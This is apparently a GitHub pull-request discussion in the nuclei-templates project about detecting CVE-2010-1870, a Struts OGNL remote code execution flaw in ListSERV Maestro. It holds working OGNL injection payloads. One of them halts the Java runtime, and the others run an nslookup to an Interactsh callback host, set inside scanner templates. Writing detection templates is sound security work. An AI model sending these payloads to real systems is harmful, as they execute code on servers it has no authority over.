nuclei-templates
updated severity
In my opinion an RCE is definitely not just an "info" finding - being able to execute code should be regarded as high.
Template / PR Information
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:
Template Validation
I've validated this template locally?
- [x] YES
- [ ] NO
Additional Details (leave it blank if not applicable)
Additional References:
@TheConciergeDev, thank you for the PR. Since the template is based on version only, and the vulnerability itself has not been confirmed, we have marked the severity as info.
Normally we add templates with the full PoC so that there is no chance of false positives. However, in this case the PoC is not included in the template. Thanks
Either we can try to convert the exploit into a template or we can migrate this template from the cves section to the appropriate directory.
@ehsandeep @princechaddha I found this https://www.exploit-db.com/exploits/14360

```
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
```

But I don't know the matcher.
```yaml
id: CVE-2010-1870

info:
  name: ListSERV Maestro <= 9.0-8 RCE
  author: b0yd,daffainfo
  severity: high
  description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
  reference:
    - https://www.securifera.com/advisories/sec-2020-0001/
    - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
    - https://www.exploit-db.com/exploits/14360
  tags: rce,listserv,ognl,cves,cve2010
  classification:
    cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
    cvss-score: 5.0
    cve-id: CVE-2010-1870
    cwe-id: CWE-917

requests:
  - method: GET
    path:
      # Literal block scalar: the payload must reach the server with the \u0023 and \'
      # sequences and the unescaped "false" intact. A double-quoted YAML string would
      # decode \u0023 to '#', reject \' as an unknown escape and end at the inner quote.
      - |-
        {{BaseURL}}/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

    matchers:
      - type: status
        status:
          - 200
```
Maybe like this, but with this matcher there will be many false positives.
@daffainfo correct, that'll probably return a few false positives, and the exploit appears to be destructive (as it calls an exit of the Java runtime). Are you able to add additional matchers to test the output? You can achieve this using something like:

```yaml
matchers-condition: and
matchers:
  - type: word
    words:
      - "This is a string that can be found in the body of the request!"
    part: body
  - type: status
    status:
      - 200
```

Using Interactsh may be a good idea here; below is a non-destructive payload that may work.

```
{{BaseURL}}/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec(\'nslookup {{INTERACTSH_URL}}\')')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
```
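Putting the two suggestions above together (the non-destructive out-of-band payload and an `and`-joined matcher set), as an added example rather than the PR's own template; it assumes nuclei's `{{interactsh-url}}` placeholder and its `interactsh_protocol` matcher part, and keeps the PR's `info` block.

```yaml
id: CVE-2010-1870

info:
  name: ListSERV Maestro <= 9.0-8 RCE
  author: b0yd,daffainfo
  severity: high
  description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
  reference:
    - https://www.securifera.com/advisories/sec-2020-0001/
    - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
    - https://www.exploit-db.com/exploits/14360
  tags: rce,listserv,ognl,cves,cve2010

requests:
  - method: GET
    path:
      # Block scalar so the literal \u0023 / \' sequences reach the server unchanged.
      # The OGNL expression only runs an nslookup of the Interactsh host; it does not
      # call Runtime.exit(), so a hit confirms execution without breaking the app.
      - |-
        {{BaseURL}}/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec(\'nslookup {{interactsh-url}}\')')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

    # Both conditions must hold: the action answered normally AND the target resolved
    # the Interactsh hostname, which only happens if the injected OGNL actually ran.
    # A 200 alone (the status-only matcher above) would flag every host with the action.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: status
        status:
          - 200
```

The DNS callback is the evidence of execution; the status check only filters out hosts where the Struts action is absent.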
I'll try giving this a shot, but I'll need to find vulnerable hosts first.
WIP under #3111 but currently blocked due to lack of vulnerable hosts. Once one is found and I can replicate, I can get the rest done.
Since we are following this here, I am closing this PR due to inactivity